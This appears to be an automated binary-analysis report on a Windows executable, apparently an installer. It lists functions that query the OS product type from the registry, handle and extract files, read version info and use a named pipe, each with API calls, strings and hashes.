API ID: QueryValue$Process$AddressCloseCurrentHandleInit_thread_footerModuleOpenProcWow64
String ID: BuildBranch$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$co_release$kernel32$rs_prerelease
API String ID: 1906320730-525127412
Opcode ID: 18c5b72fd046bc88277f421c63d784977dc6a26f3cb7583a10fb0d9fd0d938ed
Instruction ID: bb300e8d34ee33b814c982ef93708752d9aa3bab12b20c705db7701294adf277
Opcode Fuzzy Hash: 18c5b72fd046bc88277f421c63d784977dc6a26f3cb7583a10fb0d9fd0d938ed
Instruction Fuzzy Hash: D5A1A171900229DEDB70DF24CC45F99BBF8FB04B19F1441AAE949A71A4EB749A84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0135F8C0, Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 0135F930
RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 0135F96B
RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 0135F9E6
RegCloseKey.ADVAPI32(00000000), ref: 0135FBBE

Strings

ServerNT, xrefs: 0135F994
ProductType, xrefs: 0135F960
EmbeddedNT, xrefs: 0135FAB6
ProductSuite, xrefs: 0135F9DB
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 0135F926
Enterprise, xrefs: 0135FA39
Compute Server, xrefs: 0135FB5C
BackOffice, xrefs: 0135FA52
DataCenter, xrefs: 0135FACF
Personal, xrefs: 0135FAE9
Blade, xrefs: 0135FB00
Embedded(Restricted), xrefs: 0135FB17
Terminal Server, xrefs: 0135FA84
Security Appliance, xrefs: 0135FB2E
WinNT, xrefs: 0135F971
Small Business, xrefs: 0135FA20
Storage Server, xrefs: 0135FB45
CommunicationServer, xrefs: 0135FA6B
Small Business(Restricted), xrefs: 0135FA9D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue$CloseOpen
String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
API String ID: 1586453840-3149529848
Opcode ID: 87c7a10dd8de52c738390ac73087a3936616665d8766934e881b0bf952a97336
Instruction ID: a39809edeb16ba648139f4f02649b7a7e2f81f9fe5c8634a0539953f3b6cb1f6
Opcode Fuzzy Hash: 87c7a10dd8de52c738390ac73087a3936616665d8766934e881b0bf952a97336
Instruction Fuzzy Hash: D771E330700309CBEF609F28DD91BAA727DBB85B5CF0041759E06A7AA6EB38CD458B41

Uniqueness

Uniqueness Score: -1.00%

Function 01329A40, Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 509COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,2F685009,?,?,73B74D40,013F7CB5,000000FF,?,01367A47,00000000,.part,00000005), ref: 01329A8B
CreateDirectoryW.KERNEL32(?,00000000,?,?,014277BC,00000001,?), ref: 01329B4A
GetLastError.KERNEL32 ref: 01329B58

Strings

USERPROFILE, xrefs: 01329DCE

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLastPath
String ID: USERPROFILE
API String ID: 953296794-2419442777
Opcode ID: 73cae26571c896b2f577b8f572878e0b39aafcbf31ee67d57c0eb3a6fbe7dcdf
Instruction ID: 30f9e945687bb276fb7397e038f4e15e0e748b7531cfed264a6c711167782fd1
Opcode Fuzzy Hash: 73cae26571c896b2f577b8f572878e0b39aafcbf31ee67d57c0eb3a6fbe7dcdf
Instruction Fuzzy Hash: B302B371A006299FDB10EFACC888BAEBBF4EF54328F14465DE915E7290DB709904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01346EC0, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 362fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01347081
SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 013470E0
SetEndOfFile.KERNEL32(?), ref: 013470E9
FindCloseChangeNotification.KERNEL32(?), ref: 01347102
DeleteFileW.KERNEL32(?,00000000,00000000,?,00000000,80004005,?,?,?,2F685009), ref: 0134718B

Part of subcall function 012A0A40: RaiseException.KERNEL32(?,?,00000000,00000000,013B9368,C000008C,00000001,?,013B9399,00000000,?,01297AF7,00000000,2F685009,00000001,?), ref: 012A0A4C

Strings

%sholder%d.aiph, xrefs: 0134705D
Not enough disk space to extract file:, xrefs: 01346F8B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ChangeCloseCreateDeleteExceptionFindNotificationPointerRaise
String ID: %sholder%d.aiph$Not enough disk space to extract file:
API String ID: 2902470327-929304071
Opcode ID: 8e31b61c6b43fa3356389bf6cd213b7efa08e50fbafa5de8e4ce590cd8cf7e4b
Instruction ID: 4e94e0d5de2c988ceba417fa52c8e9fb3ffab953c5ede184e2b4e38130e7cbca
Opcode Fuzzy Hash: 8e31b61c6b43fa3356389bf6cd213b7efa08e50fbafa5de8e4ce590cd8cf7e4b
Instruction Fuzzy Hash: 35C1C071A0024A9FDB10DF6CCC84BAEBBF5FF45728F148669E915AB391D771A900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01329100, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,013F7A9D,000000FF,?,01329416,?), ref: 013291A3

Part of subcall function 01297CC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000001,?,012A4AC0,-00000010,?,012A888D,*.*), ref: 01297CE7

RemoveDirectoryW.KERNEL32(?,2F685009,?,?,?,?,013F7A9D,000000FF,?,01329416,?,00000000), ref: 013291D2
GetLastError.KERNEL32(?,2F685009,?,?,?,?,013F7A9D,000000FF,?,01329416,?,00000000), ref: 013291E2
DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,013F7A9D,000000FF,?,80004005,2F685009,?), ref: 013292B3
GetLastError.KERNEL32(?,00000000,013F7A55,000000FF), ref: 013292F2

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Strings

\\?\, xrefs: 01329164, 01329176, 01329180, 01329274, 01329286, 01329290

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryErrorInit_thread_footerLastRemove$DeleteFileFindHeapProcessResource
String ID: \\?\
API String ID: 34920479-4282027825
Opcode ID: 1795bd87dc0812cc6245735e9cfe89a440858a4893a88afb72bd3ec9cf017d30
Instruction ID: 371329696aa96c0a67b5a2d8878cded2ebb8d4ed5e21ddcdf6ed89219d666ff8
Opcode Fuzzy Hash: 1795bd87dc0812cc6245735e9cfe89a440858a4893a88afb72bd3ec9cf017d30
Instruction Fuzzy Hash: 3C51B271A006299FDB10EFADC848BADB7F4FF06329F14465DE961D72A0DB319904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013456A0, Relevance: 9.4, APIs: 6, Instructions: 354fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,2F685009,?,?,00000002,?,?,?,?,?,?,00000000,013FD8F2), ref: 013456F7
GetLastError.KERNEL32(?,00000002,?,?,?,?,?,?,00000000,013FD8F2,000000FF,?,013445FA,00000010), ref: 01345706
ReadFile.KERNEL32(?,00000000,00000008,80070057,00000000,?,00000002), ref: 013457C8
ReadFile.KERNEL32(?,2F685009,00000000,00000000,00000000,00000001,?,00000002), ref: 01345845
GetLastError.KERNEL32(?,00000002), ref: 01345989
GetLastError.KERNEL32(?,00000002), ref: 01345A33

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Read$Pointer
String ID:
API String ID: 3909885910-0
Opcode ID: 96098bf572814a0eaa93dbf00c35349ac1299f842f0d54c7d82be5084f16bbe4
Instruction ID: 79a8a09790d347c5b7817c2a176ec7f116b4b3b357298be3309dfe3a4668e9a5
Opcode Fuzzy Hash: 96098bf572814a0eaa93dbf00c35349ac1299f842f0d54c7d82be5084f16bbe4
Instruction Fuzzy Hash: 6DD18171D0020ADFEB01DFA8C884BADBBB5FF55328F148269D915AB391DB74A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013606B0, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229filepipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32(?,00000000,2F685009,?,000000FF,?,00000000,01403076,000000FF,?,013608CA,000000FF,?,00000001), ref: 013606EA
GetLastError.KERNEL32(?,013608CA,000000FF,?,00000001), ref: 013606F4

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

ReadFile.KERNEL32(?,?,00007F90,00000000,00000000,2F685009,?,000000FF,?,00000000,01403076,000000FF,?,013608CA,000000FF,?), ref: 01360737

Strings

\\.\pipe\ToServer, xrefs: 01360954, 01360965, 0136096F
Ph/, xrefs: 01360900

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$ConnectErrorFileHeapLastNamedPipeProcessRead
String ID: Ph/$\\.\pipe\ToServer
API String ID: 2973225359-4064625594
Opcode ID: 2a38351840682829df287030668f69f90d2b4df87a4ea68024c37a84f709286e
Instruction ID: f3684a0ddfa6240e599f6b5c5da2db402ecbcd1ad7cfd37ab68cb4b1abd8ec20
Opcode Fuzzy Hash: 2a38351840682829df287030668f69f90d2b4df87a4ea68024c37a84f709286e
Instruction Fuzzy Hash: DC71C271A04249AFEB14DF58C805BAEBBE9FF45328F10865DF915DB390DBB59900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01365750, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 208COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,2F685009,2F685009,?,0147B454,?,?,013480D9,?,2F685009,?,?,?,00000000,013FE095), ref: 013657B5
GetFileVersionInfoW.KERNELBASE(?,?,00000000,?,00000000,?,0147B454,?,?,013480D9,?,2F685009,?,?,?,00000000), ref: 01365803

Strings

\VarFileInfo\Translation, xrefs: 01365837
\StringFileInfo\%04x%04x\%s, xrefs: 0136586D
ProductName, xrefs: 01365863

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$Size
String ID: ProductName$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 2104008232-2149928195
Opcode ID: 342abe4c3b0b95e998a651dae7a1afbb6b909711a2e72b3a00d30a45e0f4b8bd
Instruction ID: 58b2061c9040ff207959ea9b0d18c902020c6b63217abaa93d0bffc023dfaa76
Opcode Fuzzy Hash: 342abe4c3b0b95e998a651dae7a1afbb6b909711a2e72b3a00d30a45e0f4b8bd
Instruction Fuzzy Hash: C471A271A0120ADFDB14DFACC844AEEBBF8FF15368F148169E915E7694DB349904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01364DE0, Relevance: 7.7, APIs: 5, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,2F685009,?,?,00000000,?,?,?,?,01403E0D,000000FF,?,013462ED), ref: 01364E20
CreateThread.KERNEL32(00000000,00000000,013651A0,?,00000000,?), ref: 01364E56
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01364F5F
GetExitCodeThread.KERNEL32(00000000,?), ref: 01364F6A
CloseHandle.KERNEL32(00000000), ref: 01364F8A

Part of subcall function 012A0A40: RaiseException.KERNEL32(?,?,00000000,00000000,013B9368,C000008C,00000001,?,013B9399,00000000,?,01297AF7,00000000,2F685009,00000001,?), ref: 012A0A4C

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CloseCodeEventExceptionExitHandleObjectRaiseSingleWait
String ID:
API String ID: 3595790897-0
Opcode ID: 018cb7cc9abbd74cb1e42f58c8fa42be13e19588fa6e543330c5d387a870e203
Instruction ID: e2d03bd05c2aaeeb0ee36fcd557a8d999cd93e831976581aff8bea1a3f5c1236
Opcode Fuzzy Hash: 018cb7cc9abbd74cb1e42f58c8fa42be13e19588fa6e543330c5d387a870e203
Instruction Fuzzy Hash: CC517D74A00705DFCB20CFA8C884BAEBBF5FF49718F248659E916AB750D770A844CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01328F00, Relevance: 7.7, APIs: 5, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00000000,013F7A55,000000FF), ref: 01329027
SetFileAttributesW.KERNEL32(?,00000000,?,00000000,013F7A55,000000FF), ref: 01329034
GetFileAttributesW.KERNEL32(?,?,?,0142C928,00000001,2F685009,?,?,?,00000000,013F7A55,000000FF), ref: 01329043
SetFileAttributesW.KERNEL32(?,00000000,?,00000000,013F7A55,000000FF), ref: 01329050
FindNextFileW.KERNELBASE(?,?,?,00000000,013F7A55,000000FF), ref: 0132908E

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$FindNext
String ID:
API String ID: 3019667586-0
Opcode ID: 215d15f70d54d44a04d389c639ade900f0a247e86b0dad3fe59d9f34aba9ced4
Instruction ID: 66a095e9340e1e782e781a871ef0edfd80f736bb0e38b19f9072ce8b056f8859
Opcode Fuzzy Hash: 215d15f70d54d44a04d389c639ade900f0a247e86b0dad3fe59d9f34aba9ced4
Instruction Fuzzy Hash: 0851913190166A9FDB24EF6CCC54BEE77B5FF50318F148219E925AB2E0DB359A04CB40

Uniqueness

Uniqueness Score: -1.00%

Function 013296C0, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 344COMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

PathIsUNCW.SHLWAPI(?,?), ref: 01329856
_wcschr.LIBVCRUNTIME ref: 01329872

Strings

\\?\, xrefs: 01329838, 0132983E
\\?\UNC\, xrefs: 01329751, 013297C9, 013297CF

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$HeapPathProcess_wcschr
String ID: \\?\$\\?\UNC\
API String ID: 660126660-3019864461
Opcode ID: 12f2ccf90002b236a906c0e93ed4fc854490668801a71136c7f9e87acc7b205f
Instruction ID: 5709edd41b5e865046aa340a29a7c30ec2fea874dc21e9fd3ad30245f4057e25
Opcode Fuzzy Hash: 12f2ccf90002b236a906c0e93ed4fc854490668801a71136c7f9e87acc7b205f
Instruction Fuzzy Hash: 8AC15171A0061ADBDB00DBADCC44BAEFBF8FF55318F148269E515E7291EB749904CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01329210, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,013F7A9D,000000FF,?,80004005,2F685009,?), ref: 013292B3

Part of subcall function 01297CC0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000001,?,012A4AC0,-00000010,?,012A888D,*.*), ref: 01297CE7

DeleteFileW.KERNEL32(?,2F685009,?,73BCF9C0,?,00000000,013F7A9D,000000FF,?,0132905A,?,00000000,013F7A55,000000FF), ref: 013292E2
GetLastError.KERNEL32(?,00000000,013F7A55,000000FF), ref: 013292F2

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Strings

\\?\, xrefs: 01329164, 01329176, 01329180, 01329274, 01329286, 01329290

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFileInit_thread_footer$ErrorFindHeapLastProcessResource
String ID: \\?\
API String ID: 1908169709-4282027825
Opcode ID: 92928a02fb8f9d70b86081f0935dc4686dd9313bb8b143d0a823618c690b8542
Instruction ID: 7774dcf2409bca3b4e09086ce006a6f997b00bb80be1fb703f45a4d3108a97aa
Opcode Fuzzy Hash: 92928a02fb8f9d70b86081f0935dc4686dd9313bb8b143d0a823618c690b8542
Instruction Fuzzy Hash: 4D21B575904629DFDB10EFA8C848BADB7F4FF06329F144659E861D7290D7319904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01360810, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,2F685009,?,00000010,?,?,013DD35E,000000FF), ref: 01360898

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Part of subcall function 013606B0: ConnectNamedPipe.KERNEL32(?,00000000,2F685009,?,000000FF,?,00000000,01403076,000000FF,?,013608CA,000000FF,?,00000001), ref: 013606EA
Part of subcall function 013606B0: GetLastError.KERNEL32(?,013608CA,000000FF,?,00000001), ref: 013606F4

Strings

\\.\pipe\ToServer, xrefs: 01360954, 01360965, 0136096F
Ph/, xrefs: 01360900

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$ConnectErrorFileHeapLastNamedPipeProcessWrite
String ID: Ph/$\\.\pipe\ToServer
API String ID: 3549655173-4064625594
Opcode ID: 2ff1606c4c50a270fd3706e30a4cbc059f56f24c5e42d019aee39b48de368d56
Instruction ID: 05874486219e128321712ef09625621ef880f8c6a103676ec3a8671a8f6a1050
Opcode Fuzzy Hash: 2ff1606c4c50a270fd3706e30a4cbc059f56f24c5e42d019aee39b48de368d56
Instruction Fuzzy Hash: 1041A175A00209AFEB08DF58C805BAEBBF9EF44728F00825EF915DB390DB759900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013CD7FE, Relevance: 4.7, APIs: 3, Instructions: 199COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 013CD9B4

Part of subcall function 013CC4F2: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,013CD741,?,00000000,?,013C3349,?,00000004,?,?,?,?,013CB8A2), ref: 013CC524

__freea.LIBCMT ref: 013CD9BD
__freea.LIBCMT ref: 013CD9E0

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 450befd0faac32ca00d6ff1a5b4c66877763287498b997a3a414013d1dfd3a90
Instruction ID: 995f0b5df924d21b7157d56431b58fd806c64e09b1eb11165bcede2b90108889
Opcode Fuzzy Hash: 450befd0faac32ca00d6ff1a5b4c66877763287498b997a3a414013d1dfd3a90
Instruction Fuzzy Hash: 5A51867650021AABEB315EA88C80EFF7AAADB45A58F15413DFE08A7154EB74DC1187D0

Uniqueness

Uniqueness Score: -1.00%

Function 013D17FD, Relevance: 3.2, APIs: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 013D1398: GetOEMCP.KERNEL32(00000000,013D1609,?,?,013C0915,013C0915,?,?,?), ref: 013D13C3

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,013D1650,?,00000000,?,?,?,?,?,?,013C0915), ref: 013D185B
GetCPInfo.KERNEL32(00000000,013D1650,?,?,013D1650,?,00000000,?,?,?,?,?,?,013C0915,?,?), ref: 013D189D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: c4646d6edcc6e458459229a8089cb882493296fec593aa3831b3ce957fbd50c8
Instruction ID: 1c93cf8aca943c11e0abff471ac08679264ddf5b99d07a39fbe1d3f700f3d2bc
Opcode Fuzzy Hash: c4646d6edcc6e458459229a8089cb882493296fec593aa3831b3ce957fbd50c8
Instruction Fuzzy Hash: 6C5133B2A003469FEB21CF7AE4816AAFFF5EF41308F18442ED1969B252D7759545CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013D15EE, Relevance: 3.1, APIs: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 013D1398: GetOEMCP.KERNEL32(00000000,013D1609,?,?,013C0915,013C0915,?,?,?), ref: 013D13C3

_free.LIBCMT ref: 013D1666

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 96973362ab54b654bafd4c331ec5aeee3547b0dbe7d80d6151c33b1ecb74a5e1
Instruction ID: 17492717db1a64661c3d34ce5d10f1dd411ef69ecaa93ab0c8506f50d64daac4
Opcode Fuzzy Hash: 96973362ab54b654bafd4c331ec5aeee3547b0dbe7d80d6151c33b1ecb74a5e1
Instruction Fuzzy Hash: C831A37290020AAFDB11DFACE880ADE77B5FF44328F15406AE914AB261EB31DD50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 013451C0, Relevance: 3.1, APIs: 2, Instructions: 87fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,C000008C,00000001,2F685009,?,?,?), ref: 01345227
GetLastError.KERNEL32 ref: 01345236
ReadFile.KERNEL32(?,?,00000018,?,00000000,?,?,?), ref: 01345334

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastPointerRead
String ID:
API String ID: 64821003-0
Opcode ID: a800c0829b17211f0b80ecebd2cd7aee85a59a86f9ebf2a25657590af60f8ff0
Instruction ID: 63b714740756099af97a79743561da6f90d0ff0e65eee28c9761ade0dbf9bb9a
Opcode Fuzzy Hash: a800c0829b17211f0b80ecebd2cd7aee85a59a86f9ebf2a25657590af60f8ff0
Instruction Fuzzy Hash: B93191B1D00605AFDB10DFA8CC45A99FBB5FF49724F14432AE925A73D0EB31A914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01363CA0, Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000), ref: 01363D05
CloseHandle.KERNEL32(?), ref: 01363D59

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFreeHandleLibrary
String ID:
API String ID: 10933145-0
Opcode ID: 69af038c00a4e72578e021d1fa7d2ec48303a89892b94791ee6fd7646021ba36
Instruction ID: de788ecbec645c3514fccc143c49f596618f38dd71e4ca867b8fd4adcec701ce
